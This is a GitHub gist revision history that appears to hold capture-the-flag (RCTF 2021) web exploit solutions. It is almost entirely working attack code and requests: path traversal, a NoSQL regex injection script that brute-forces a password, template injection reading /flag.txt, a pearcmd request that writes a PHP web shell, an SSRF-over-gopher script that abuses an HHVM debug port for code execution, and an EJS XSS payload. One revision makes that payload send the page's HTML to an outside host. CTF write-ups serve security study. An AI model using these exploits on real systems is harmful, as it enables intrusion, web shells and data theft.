Last active
September 14, 2021 04:51
-
-
Save TheGrandPew/79f076a4f68fc00286d5d33540bb5aa8 to your computer and use it in GitHub Desktop.
Revisions
-
TheGrandPew revised this gist
Sep 13, 2021 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -80,5 +80,5 @@ print(r.text) EJS ODAY RIGHT HERE ``` http://host:3333/?asoul={"jiaran":"A","xiangwan":"x","beila":"A","jiale":"x","nailin":"A","__append":"A","filename":" function rethrow(){fetch(`http://sitetosenddatto.com/?${btoa(document.documentElement.innerHTML)}`)}//"} ``` -
Sep 13, 2021 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -15,7 +15,7 @@ import urllib.parse urllib3.disable_warnings() username="rabbit" password="" u="http://123.60.21.23:23333/user/login" while True: -
Sep 13, 2021 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -61,7 +61,7 @@ function main(): void { }""" code = base64.b64encode(code).decode() packet = '{"command":"attach","arguments":{"name":"HHVM: Attach to Server","type":"hhvm","request":"attach","host":"localhost","port":8999,"remoteSiteRoot":"/tmp/censored","localWorkspaceRoot":"/tmp/censored2","__configurationTarget":5,"__sessionId":"9a121298-30b3-4be1-86ab-30fa15b036b6","sandboxUser":"user"},"type":"request","seq":2}\x00' packet += '{"command":"setExceptionBreakpoints","arguments":{"filters":[]},"type":"request","seq":3}\x00' packet += '{"command":"configurationDone","type":"request","seq":4}\x00' packet += '{"command":"threads","type":"request","seq":5}\x00' -
Sep 13, 2021 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -48,7 +48,7 @@ Content-Length: 0 ### HIPHOP Use vs code debug port to get rce then a hhvm 0day ```python3 import requests import urllib.parse -
Sep 13, 2021 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -34,7 +34,7 @@ Template Injection: ``` address=a"+x=`${process.mainModule.require('fs').readFileSync('/flag.txt')}`+g="b ``` ### Verysafe -
Sep 13, 2021 . 1 changed file with 79 additions and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -3,4 +3,82 @@ GET /%2561dmin%3Flogin&data=..%252F..%252F..%252F..%252Fflag HTTP/1.1 Host: 124.71.132.232:60080 User-Agent: AG ``` ### CandySHOP leak: ```python import requests import urllib3 import string import urllib.parse urllib3.disable_warnings() username="rabbit" password="fe2873189def873315709d8997b8bf4c740c46b8770481e23d3acd03f944865f" u="http://123.60.21.23:23333/user/login" while True: print("REPEAT") for c in 'abcdef0123456789': payload='username=rabbit&password[$regex]=^%s' % ((password + c)) r = requests.post(u, data=payload,headers={"Content-Type": "application/x-www-form-urlencoded"}) print("LOOP") if 'You Bad Bad' in r.text: print("Found one more char : %s" % (password+c)) password += c break ``` Template Injection: ``` address=a"+x=`${process.mainModule.require('fs').readFileSync('/flag.txt')}`+g="b ### Verysafe Write php shell to tmp: ``` GET /../usr/local/lib/php/pearcmd.php?f=pearcmd&+-s+-c+/tmp/pewpewpewshell.php+-d+preferred_mirror="<?system($_GET[1]);?>" HTTP/1.1 Host: host Content-Length: 0 ``` ### HIPHOP Use vs code to get rce then a hhvm 0day ```python3 import requests import urllib.parse import base64 code = b"""<?hh <<__EntryPoint>> function main(): void { <cmd whitelist bypass that i censored :( > }""" code = base64.b64encode(code).decode() packet = '{"command":"attach","arguments":{"name":"HHVM: Attach to Server","type":"hhvm","request":"attach","host":"localhost","port":8999,"remoteSiteRoot":"/Users/zedd/Documents/writeup/2021/RCTF/hiphop/src","localWorkspaceRoot":"/Users/zedd/Documents/writeup/2021/RCTF/hiphop/src","__configurationTarget":5,"__sessionId":"9a121298-30b3-4be1-86ab-30fa15b036b6","sandboxUser":"zedd"},"type":"request","seq":2}\x00' packet += '{"command":"setExceptionBreakpoints","arguments":{"filters":[]},"type":"request","seq":3}\x00' packet += '{"command":"configurationDone","type":"request","seq":4}\x00' packet += '{"command":"threads","type":"request","seq":5}\x00' packet += '{"command":"evaluate","arguments":{"expression":"file_put_contents(\\"/var/www/html/sandbox/77b6f664807ad8e5dc17aeecdf8823af/pewoutput.php\\",base64_decode(\\"findme\\"))","context":"repl"},"type":"request","seq":6}\x00'.replace('findme',code) packet = urllib.parse.quote_plus(urllib.parse.quote_plus(packet)) r = requests.get("http://124.71.132.232:58080/?url=gopher://localhost:8999/_"+packet) r = requests.get("http://124.71.132.232:58080/sandbox/77b6f664807ad8e5dc17aeecdf8823af/pewoutput.php") print(r.text) ``` ### XSS IT EJS ODAY RIGHT HERE ``` http://localhost:3333/?asoul={"jiaran":"A","xiangwan":"x","beila":"A","jiale":"x","nailin":"A","__append":"A","filename":" function rethrow(){alert(1)}//"} ``` -
Sep 13, 2021 . 1 changed file with 6 additions and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1 +1,6 @@ ### EASYPHP ```http GET /%2561dmin%3Flogin&data=..%252F..%252F..%252F..%252Fflag HTTP/1.1 Host: 124.71.132.232:60080 User-Agent: AG ``` -
Sep 13, 2021 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1 @@ pew